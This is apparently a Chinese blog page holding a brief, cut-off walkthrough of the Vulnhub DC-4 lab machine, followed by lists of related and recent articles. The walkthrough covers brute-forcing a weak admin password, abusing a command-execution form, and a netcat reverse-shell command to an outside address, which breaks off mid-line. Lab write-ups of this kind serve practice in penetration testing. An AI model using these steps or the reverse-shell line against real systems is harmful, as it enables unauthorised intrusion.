Vulnhub滲透測試靶機DC-4
下載地址:https://www.vulnhub.com/entry/dc-4,313/ nmap沒有掃描到什麼有用端口 直接訪問80端口 只有一個認證框 沒有驗證 bp爆破admin弱密碼 發現密碼admin qwert 進入後臺 發現有執行命令的地方 抓包發現命令由post包傳過去 執行的命令由客戶端傳到了服務端 命令執行獲取shell 把nc -e /bin/sh 192.168.49.12
相關文章
- 1. 【滲透測試】靶機滲透Vulnhub-bulldog
- 2. vulnhub之DC4靶機
- 3. vulnhub滲透測試靶機prime-1
- 4. vulnhub滲透測試靶機DC-8
- 5. vulnhub滲透測試靶機DC-6
- 6. Vulnhub滲透測試靶機DC-5
- 7. vulnhub滲透測試靶機DC-3
- 8. vulnhub滲透測試靶機DC-7
- 9. vulnhub系列靶機--DC4
- 10. 滲透:vulnhub-XXE 靶機
- 更多相關文章...
- • Maven 構建 & 項目測試 - Maven教程
- • Lua 調試(Debug) - Lua 教程
- • 漫談MySQL的鎖機制
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Appium入門
- 2. Spring WebFlux 源碼分析(2)-Netty 服務器啓動服務流程 --TBD
- 3. wxpython入門第六步(高級組件)
- 4. CentOS7.5安裝SVN和可視化管理工具iF.SVNAdmin
- 5. jedis 3.0.1中JedisPoolConfig對象缺少setMaxIdle、setMaxWaitMillis等方法,問題記錄
- 6. 一步一圖一代碼,一定要讓你真正徹底明白紅黑樹
- 7. 2018-04-12—(重點)源碼角度分析Handler運行原理
- 8. Spring AOP源碼詳細解析
- 9. Spring Cloud(1)
- 10. python簡單爬去油價信息發送到公衆號
歡迎關注本站公眾號,獲取更多信息
